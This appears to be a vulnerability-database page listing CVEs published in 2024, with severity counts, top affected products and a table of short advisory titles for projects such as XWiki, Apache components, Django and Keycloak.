CVEs from 2024
Total
6,592
critical
critical 174
high
high 1,069
medium
medium 2,083
low
low 49
% Critical
2.6%
% with KEV
2.5%
% with exploit
3.4%
Top products
- mbed_tls 15
- operations_analytics_log_analysis 14
- surveillance_station 12
- checkmk 10
- office 8
- profilegrid 8
- office_long_term_servicing_channel 6
- propertyhive 5
Top packages
| CVE | Severity | CVSS | Risk | Flags | OS | Vendor | Published | Description |
|---|---|---|---|---|---|---|---|---|
| CVE-2024-41948 | unknown | — | — | 2y ago | biscuit-java vulnerable to public key confusion in third party block | |||
| CVE-2024-23444 | unknown | — | — | 2y ago | Elasticsearch stores private key on disk unencrypted | |||
| CVE-2024-37901 | unknown | — | — | 2y ago | XWiki Platform vulnerable to remote code execution from account via SearchSuggestConfigSheet | |||
| CVE-2024-37900 | unknown | — | — | 2y ago | XWiki Platform vulnerable to Cross-site Scripting through attachment filename in uploader | |||
| CVE-2024-37898 | unknown | — | — | 2y ago | XWiki Platform vulnerable to document deletion and overwrite from edit | |||
| CVE-2024-41110 | unknown | — | — | 2y ago | Moby is an open-source project created by Docker for software containerization. A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypas… | |||
| CVE-2024-40094 | unknown | — | — | 2y ago | GraphQL Java does not properly consider ExecutableNormalizedFields (ENFs) as part of preventing denial of service | |||
| CVE-2024-29068 | unknown | — | — | 2y ago | In snapd versions prior to 2.62, snapd failed to properly check the file type when extracting a snap. The snap format is a squashfs file-system image and so can contain files that are non-regular fil… | |||
| CVE-2024-1724 | unknown | — | — | 2y ago | In snapd versions prior to 2.62, when using AppArmor for enforcement of sandbox permissions, snapd failed to restrict writes to the $HOME/bin path. In Ubuntu, when this path exists, it is automatica… | |||
| CVE-2024-29069 | unknown | — | — | 2y ago | In snapd versions prior to 2.62, snapd failed to properly check the destination of symbolic links when extracting a snap. The snap format is a squashfs file-system image and so can contain symbolic … | |||
| CVE-2024-41667 | unknown | — | — | 2y ago | OpenAM FreeMarker template injection | |||
| CVE-2024-37084 | unknown | — | — | 2y ago | Remote code execution in Spring Cloud Data Flow | |||
| CVE-2024-39676 | unknown | — | — | 2y ago | Apache Pinot: Unauthorized endpoint exposed sensitive information | |||
| CVE-2024-40767 | unknown | — | — | 2y ago | In OpenStack Nova before 27.4.1, 28 before 28.2.1, and 29 before 29.1.1, by supplying a raw format image that is actually a crafted QCOW2 image with a backing file path or VMDK flat image with a desc… | |||
| CVE-2024-25638 | unknown | — | — | 2y ago | DNSJava DNSSEC Bypass | |||
| CVE-2024-38503 | unknown | — | — | 2y ago | Apache Syncope Improper Input Validation vulnerability | |||
| CVE-2024-23321 | unknown | — | — | 2y ago | Apache RocketMQ Vulnerable to Unauthorized Exposure of Sensitive Data | |||
| CVE-2024-6960 | unknown | — | — | 2y ago | H2O vulnerable to Deserialization of Untrusted Data | |||
| CVE-2024-32007 | unknown | — | — | 2y ago | Apache CXF Denial of Service vulnerability in JOSE | |||
| CVE-2024-29736 | unknown | — | — | 2y ago | Apache CXF: SSRF vulnerability via WADL stylesheet parameter | |||
| CVE-2024-41172 | unknown | — | — | 2y ago | Apache CXF allows unrestricted memory consumption in CXF HTTP clients | |||
| CVE-2024-40642 | unknown | — | — | 2y ago | Absent Input Validation in BinaryHttpParser | |||
| CVE-2024-39900 | unknown | — | — | 2y ago | The OpenSearch reporting plugin improperly controls tenancy access to reporting resources | |||
| CVE-2024-29178 | unknown | — | — | 2y ago | Apache StreamPark: FreeMarker SSTI RCE Vulnerability | |||
| CVE-2024-40644 | unknown | — | — | 2y ago | gitoxide An idiomatic, lean, fast & safe pure Rust implementation of Git. `gix-path` can be tricked into running another `git.exe` placed in an untrusted location by a limited user account on Windows… | |||
| CVE-2024-29120 | unknown | — | — | 2y ago | Apache StreamPark: Information leakage vulnerability | |||
| CVE-2024-31411 | unknown | — | — | 2y ago | Apache StreamPipes has potential remote code execution (RCE) via file upload | |||
| CVE-2024-31979 | unknown | — | — | 2y ago | Apache StreamPipes has possibility of SSRF in pipeline element installation process | |||
| CVE-2024-30471 | unknown | — | — | 2y ago | Apache StreamPipes potentially allows creation of multiple identical accounts | |||
| CVE-2024-29737 | unknown | — | — | 2y ago | Apache StreamPark: maven build params could trigger remote command execution | |||
| CVE-2024-36522 | unknown | — | — | 2y ago | Apache Wicket: Remote code execution via XSLT injection | |||
| CVE-2024-6484 | unknown | — | — | 2y ago | Withdrawn Advisory: Bootstrap Cross-Site Scripting (XSS) vulnerability | |||
| CVE-2024-39901 | unknown | — | — | 2y ago | OpenSearch Observability does not properly restrict access to private tenant resources | |||
| CVE-2024-39614 | unknown | — | — | 2y ago | An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. get_supported_language_variant() was subject to a potential denial-of-service attack when used with very long strings contain… | |||
| CVE-2024-39330 | unknown | — | — | 2y ago | An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. Derived classes of the django.core.files.storage.Storage base class, when they override generate_filename() without replicati… | |||
| CVE-2024-39329 | unknown | — | — | 2y ago | An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. The django.contrib.auth.backends.ModelBackend.authenticate() method allows remote attackers to enumerate users via a timing a… | |||
| CVE-2024-38875 | unknown | — | — | 2y ago | An issue was discovered in Django 4.2 before 4.2.14 and 5.0 before 5.0.7. urlize and urlizetrunc were subject to a potential denial of service attack via certain inputs with a very large number of br… | |||
| CVE-2024-39031 | unknown | — | — | 2y ago | Silverpeas Core Cross-site Scripting vulnerability | |||
| CVE-2024-22271 | unknown | — | — | 2y ago | Spring Cloud Function Framework vulnerable to Denial of Service | |||
| CVE-2024-38372 | unknown | — | — | 2y ago | Undici is an HTTP/1.1 client, written from scratch for Node.js. Depending on network and process conditions of a `fetch()` request, `response.arrayBuffer()` might include portion of memory from the N… | |||
| CVE-2024-3653 | unknown | — | — | 2y ago | Undertow Missing Release of Memory after Effective Lifetime vulnerability | |||
| CVE-2024-5971 | unknown | — | — | 2y ago | Undertow Denial of Service vulnerability | |||
| CVE-2024-37389 | unknown | — | — | 2y ago | Apache NiFi vulnerable to Cross-site Scripting | |||
| CVE-2024-39689 | unknown | — | — | 2y ago | Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi starting in 2021.5.30 and prior to 2024.… | |||
| CVE-2024-32498 | unknown | — | — | 2y ago | An issue was discovered in OpenStack Cinder through 24.0.0, Glance before 28.0.2, and Nova before 29.0.3. Arbitrary file access can occur via custom QCOW2 external data. By supplying a crafted QCOW2 … | |||
| CVE-2024-39236 | unknown | — | — | 2y ago | Withdrawn Advisory: Gradio was discovered to contain a code injection vulnerability via the component /gradio/component_meta.py | |||
| CVE-2024-24749 | unknown | — | — | 2y ago | Classpath resource disclosure in GWC Web Resource API on Windows / Tomcat | |||
| CVE-2024-34696 | unknown | — | — | 2y ago | GeoServer's Server Status shows sensitive environmental variables and Java properties | |||
| CVE-2024-39458 | unknown | — | — | 2y ago | Exposure of secrets through system log in Jenkins Structs Plugin | |||
| CVE-2024-39460 | unknown | — | — | 2y ago | Bitbucket OAuth access token exposed in the build log by Bitbucket Branch Source Plugin | |||
| CVE-2024-39459 | unknown | — | — | 2y ago | Secret file credentials stored unencrypted in rare cases by Plain Credentials Plugin | |||
| CVE-2024-58261 | unknown | — | — | 2y ago | The sequoia-openpgp crate 1.13.0 before 1.21.0 for Rust allows an infinite loop of "Reading a cert: Invalid operation: Not a Key packet" messages for RawCertParser operations that encounter an unsupp… | |||
| CVE-2024-38364 | unknown | — | — | 2y ago | DSpace Cross Site Scripting (XSS) via a deposited HTML/XML document | |||
| CVE-2024-38374 | unknown | — | — | 2y ago | Improper Restriction of XML External Entity Reference in org.cyclonedx:cyclonedx-core-java | |||
| CVE-2024-38369 | unknown | — | — | 2y ago | XWiki programming rights may be inherited by inclusion | |||
| CVE-2024-29868 | unknown | — | — | 2y ago | Apache StreamPipes: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in Recovery Token Generation | |||
| CVE-2024-27136 | unknown | — | — | 2y ago | Cross site scripting in Apache JSPWiki | |||
| CVE-2024-5967 | unknown | — | — | 2y ago | Keycloak leaks configured LDAP bind credentials through the Keycloak admin console | |||
| CVE-2024-37899 | unknown | — | — | 2y ago | XWiki Platform allows remote code execution from user account | |||
| CVE-2024-6162 | unknown | — | — | 2y ago | Undertow's url-encoded request path information can be broken on ajp-listener | |||
| CVE-2024-38595 | unknown | — | — | 2y ago | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix peer devlink set for SF representor devlink port The cited patch change register devlink flow, and neglect to refle… | |||
| CVE-2024-36543 | unknown | — | — | 2y ago | STRIMZI incorrect access control | |||
| CVE-2024-37902 | unknown | — | — | 2y ago | DeepJavaLibrary API absolute path traversal | |||
| CVE-2024-38460 | unknown | — | — | 2y ago | SonarQube logs sensitive information | |||
| CVE-2024-37309 | unknown | — | — | 2y ago | CrateDB has a Client initialized Session-Renegotiation DoS | |||
| CVE-2024-37280 | unknown | — | — | 2y ago | Elasticsearch StackOverflow vulnerability | |||
| CVE-2024-1722 | unknown | — | — | 2y ago | Keycloak Denial of Service via account lockout | |||
| CVE-2024-36263 | unknown | — | — | 2y ago | Apache Submarine Server Core has a SQL Injection Vulnerability | |||
| CVE-2024-36265 | unknown | — | — | 2y ago | Apache Submarine Server Core Incorrect Authorization vulnerability | |||
| CVE-2024-36264 | unknown | — | — | 2y ago | Apache Submarine Commons Utils has a hard-coded secret | |||
| CVE-2024-3656 | unknown | — | — | 2y ago | Keycloak's admin API allows low privilege users to use administrative functions | |||
| CVE-2024-35255 | unknown | — | — | 2y ago | Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability | |||
| CVE-2024-35241 | unknown | — | — | 2y ago | Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `status`, `reinstall` and `remove` commands with packages installed from source via git containing … | |||
| CVE-2024-35242 | unknown | — | — | 2y ago | Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `composer install` command running inside a git/hg repository which has specially crafted branch na… | |||
| CVE-2024-4540 | unknown | — | — | 2y ago | Keycloak exposes sensitive information in Pushed Authorization Requests (PAR) | |||
| CVE-2024-37568 | unknown | — | — | 2y ago | lepture Authlib before 1.3.1 has algorithm confusion with asymmetric public keys. Unless an algorithm is specified in a jwt.decode call, HMAC verification is allowed with any asymmetric public key. (… | |||
| CVE-2024-36823 | unknown | — | — | 2y ago | Weak encryption in Ninja Core | |||
| CVE-2024-5187 | unknown | — | — | 2y ago | onnx allows Arbitrary File Overwrite in download_model_with_test_data | |||
| CVE-2024-36121 | unknown | — | — | 2y ago | BoringSSLAEADContext in Netty Repeats Nonces | |||
| CVE-2024-36124 | unknown | — | — | 2y ago | iq80 Snappy out-of-bounds read when uncompressing data, leading to JVM crash | |||
| CVE-2024-0336 | unknown | — | — | 2y ago | Missing Authentication for Critical Function vulnerability in EMTA Grup PDKS allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PDKS: from V3.04 before 20240… | |||
| CVE-2024-36042 | unknown | — | — | 2y ago | Silverpeas authentication bypass | |||
| CVE-2024-36114 | unknown | — | — | 2y ago | Decompressors can crash the JVM and leak memory content in Aircompressor | |||
| CVE-2024-5520 | unknown | — | — | 2y ago | OpenCMS Cross-Site Scripting vulnerability | |||
| CVE-2024-35219 | unknown | — | — | 2y ago | OpenAPI Generator Online - Arbitrary File Read/Delete | |||
| CVE-2024-0851 | unknown | — | — | 2y ago | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Grup Arge Energy and Control Systems Smartpower allows SQL Injection. This issue affects Smartpo… | |||
| CVE-2024-22588 | unknown | — | — | 2y ago | Kwik does not discard unused encryption keys | |||
| CVE-2024-5273 | unknown | — | — | 2y ago | Jenkins Report Info Plugin Path Traversal vulnerability | |||
| CVE-2024-5165 | unknown | — | — | 2y ago | Eclipse Ditto vulnerable to Cross-site Scripting | |||
| CVE-2024-29392 | unknown | — | — | 2y ago | Silverpeas Core vulnerable to Cross Site Scripting | |||
| CVE-2024-35186 | unknown | — | — | 2y ago | gitoxide is a pure Rust implementation of Git. During checkout, `gix-worktree-state` does not verify that paths point to locations in the working tree. A specially crafted repository can, when cloned… | |||
| CVE-2024-35197 | unknown | — | — | 2y ago | gitoxide is a pure Rust implementation of Git. On Windows, fetching refs that clash with legacy device names reads from the devices, and checking out paths that clash with such names writes arbitrary… | |||
| CVE-2024-28087 | unknown | — | — | 2y ago | Bonitasoft Runtime Community edition's contains an insecure direct object references vulnerability | |||
| CVE-2024-32888 | unknown | — | — | 2y ago | Amazon JDBC Driver for Redshift SQL Injection via line comment generation | |||
| CVE-2024-32077 | unknown | — | — | 2y ago | Apache Airflow: XSS vulnerability in Task Instance Log/Log Details | |||
| CVE-2024-3462 | unknown | — | — | 2y ago | Ant Media Server does not properly authorize non-administrative API calls | |||
| CVE-2024-34365 | unknown | — | — | 2y ago | Apache Karaf Cave: Cave SSRF and arbitrary file access | |||
| CVE-2024-29857 | unknown | — | — | 2y ago | Bouncy Castle certificate parsing issues cause high CPU usage during parameter evaluation. | |||
| CVE-2024-30172 | unknown | — | — | 2y ago | Bouncy Castle crafted signature and public key can be used to trigger an infinite loop | |||
| CVE-2024-30171 | unknown | — | — | 2y ago | Bouncy Castle affected by timing side-channel for RSA key exchange ("The Marvin Attack") |